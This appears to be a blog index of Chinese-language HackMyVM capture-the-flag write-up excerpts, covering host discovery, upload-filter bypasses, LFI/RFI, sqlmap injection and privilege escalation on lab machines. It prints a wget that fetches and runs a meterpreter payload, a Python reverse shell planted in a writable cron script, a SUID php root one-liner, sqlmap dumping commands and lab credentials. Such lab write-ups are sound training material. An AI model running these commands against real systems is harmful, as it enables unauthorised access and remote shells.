XMAS

2024-02-14 #sec/hackmyvm 

靶机, 启动

192.168.10.16

端口扫描

HMM_XMAS_image_1

HMM_XMAS_image_2

web 服务

目录扫描

HMM_XMAS_image_3

在主页的下面发现了一个上传点, 直接上传反弹 shell

HMM_XMAS_image_4

使用 nc 失败, 换成了 webshell

HMM_XMAS_image_5

HMM_XMAS_image_6 然后还是用了 meterpreter

wget http://192.168.10.11:8000/shell.elf -O /tmp/shell.elf&&chmod 777 /tmp/shell.elf

www-data ,进一步收集信息

/home/alabaster/nice_list. txt

HMM_XMAS_image_7

这有个 python 代码,. 在 linpeas. sh 枚举之后发现是定时任务, 并且是可写的

HMM_XMAS_image_8

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > nice_or_naughty.py


echo 'import subprocess; subprocess.call(["/tmp/newshell.elf"])' > nice_or_naughty.py

又是这样子不稳定的 shell

HMM_XMAS_image_9

上传一个 socat 二进制文件上去算了

阅读全文 →

vivifytech

2024-02-13 #sec/hackmyvm 

192.168.10.12

端口扫描

HMM_vivifytech_image_1

web目录扫描

进一步扫描 WordPress 下的目录

HMM_vivifytech_image_2

发现敏感文件 secret. txt,

HMM_vivifytech_image_3

根据收集的用户名, 密码爆破 ssh

HMM_vivifytech_image_4

HMM_vivifytech_image_5|400

HMM_vivifytech_image_6

HMM_vivifytech_image_7

sarah:bohicon

USER. txt PWD

HMM_vivifytech_image_8

收集泄露信息,横向移动

jresig secret HMM_vivifytech_image_9

HMM_vivifytech_image_10

sarah@VivifyTech:~/.gnupg/crls.d$ cat DIR.txt
v:1:

在用户目录里面发现了 TASK. txt 文件 下次应该直接全局找一下. txt 文件

HMM_vivifytech_image_11

sarah@VivifyTech:~/.private$ cat Tasks.txt
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

利用 sudo git 提权

HMM_vivifytech_image_12

阅读全文 →

zon

2024-02-11 #sec/hackmyvm 

启动机器

得指定网络接口

sudo arp-scan -I eth5 -l

HMM_zon_image_1

端口扫描

sudo rustscan -a 192.168.10.13 -r 1-65535 -t 8000 --ulimit 5000

sudo nmap 192.168.10.13 -sT -Pn -p22,80 -sV -sC -O -oN portscan/norm


sudo nmap 192.168.10.13 -sT -Pn -p22,80 --script=vuln -oN portscan/vuln

HMM_zon_image_2

HMM_zon_image_3

利用空格绕过文件上传过滤

HMM_zon_image_4

测试之后是检查文件名, 而不是文件头, 而且图片马不能正常解析 HMM_zon_image_5|750

  • 非 jpeg 格式的无法上传 HMM_zon_image_6

  • jpeg 格式能够正常上传 HMM_zon_image_7 HMM_zon_image_8 后面尝试了图片马, 但是没有正常解析, 无法执行命令

使用空格绕过

"webshell.jpeg .php"

HMM_zon_image_9

一句话木马, 获得 webshell HMM_zon_image_10 freddie

阅读全文 →

quick

2024-02-10 #sec/hackmyvm 

host discovery

主机发现, 重置了 wsl 的环境之后, 发现能够使用 arp-scan 了 HMM_quick_image_1 前后对比 HMM_quick_image_2

192.168.10.12

port scan

只有一个 80 端口 HMM_quick_image_3

服务版本, 默认脚本, 操作系统扫描 HMM_quick_image_4 漏洞扫描 HMM_quick_image_5

利用远程包含获得 shell

RFI HMM_quick_image_6 HMM_quick_image_7

user. txt PWD

HMM_quick_image_8 HMM_quick_image_9

use SUID file to get root

find / -type f -perm -u=s 2>/dev/null 发现一个suid的 php

./usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

root. txt PWD

HMM_quick_image_10

vinylizer

2024-02-10 #sec/hackmyvm 

主机发现

使用 nmap 进行主机发现[[THM_Nmap Live Host Discovery(活动主机发现)]]

sudo nmap 192.168.10.1/24 -PA -sn -oN portscan/discovery.nmap

HMM_vinylizer_image_1

192.168.10.10

端口扫描

HMM_vinylizer_image_2 HMM_vinylizer_image_3

web 侦查

HMM_vinylizer_image_4

利用登录页面的 sql 注入

sqlmap

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login="

HMM_vinylizer_image_5

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 7762 FROM (SELECT(SLEEP(5)))rBJA) AND 'mJfQ'='mJfQ&password=admin&login=
---

查看所有数据库

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --dbs

HMM_vinylizer_image_6 查看数据库的表信息

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --tables -D vinyl_marketplace

HMM_vinylizer_image_7 查看某一个表的列信息

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --columns -D vinyl_marketplace -T users

HMM_vinylizer_image_8 查看对应列的信息

阅读全文 →

zeug_hard

2024-02-09 #sec/hackmyvm 

netdiscover

主机发现

启动前 HMM_zeug_image_1|550 启动后, 以后就先导入 VirtualBox 然后导出, 再导入 VMware 算了 HMM_zeug_image_2 靶机 ip 192.168.10.4

端口扫描

HMM_zeug_image_3

HMM_zeug_image_4|700

HMM_zeug_image_5|550 HMM_zeug_image_6|600 HMM_zeug_image_7

FTP 匿名登录

HMM_zeug_image_8

~/workspace cat README.txt
Hi, Cosette, don't forget to disable the debug mode in the web application, we don't want security breaches.

提示有一个 debug 页面可以利用

web 侦查

进去之后是一个上传文件的页面, 先去搜了一下 cve, 因为不确定 cms 名称啥的, 后面搜到了 console 目录, 然后访问了 console 目录, 才确定这是 Werkzeug HMM_zeug_image_9|900 这里的 cve 用不了 想着来目录扫描一下 HMM_zeug_image_10|550

阅读全文 →

quick2

2024-02-09 #sec/hackmyvm 

启动靶机前 HMM_quick2_image_1|700 启动后 HMM_quick2_image_2|650 192.168.10.4 HMM_quick2_image_3|600 2024-02-14-20:18:39 后面都是直接用 arp-scan 来扫描某一个网卡的下的局域网ip 了

端口扫描

HMM_quick2_image_4|700

sudo nmap 192.168.10.4 -p22,80 -Pn -sT -sV -O -sC -oA  portscan/nmap

HMM_quick2_image_5|750

sudo nmap 192.168.10.4 -sT -Pn -p20,80 --script=vuln -oA  portscan/vuln

HMM_quick2_image_6|700

web 服务

主页里面在端口扫描的时候发现有一个参数 page 尝试 local file include LFI 获取到了/etc/passwd 在 home 目录下有文件夹的有这两个用户

andrew:x:1000:1000: Andrew Speed:/home/andrew:/bin/bash
nick:x:1001:1001: Nick Greenhorn,,,:/home/nick:/bin/bash

获得了 user. txt

HMM_quick2_image_7|500

HMM_quick2_image_8|483

进行目录扫描 ferox 发现失效了, 以后还是先尝试 gobuster, 不行的话再 feroxbuster HMM_quick2_image_9|750 进入 file. php 页面

阅读全文 →

Search Results

2023-11-23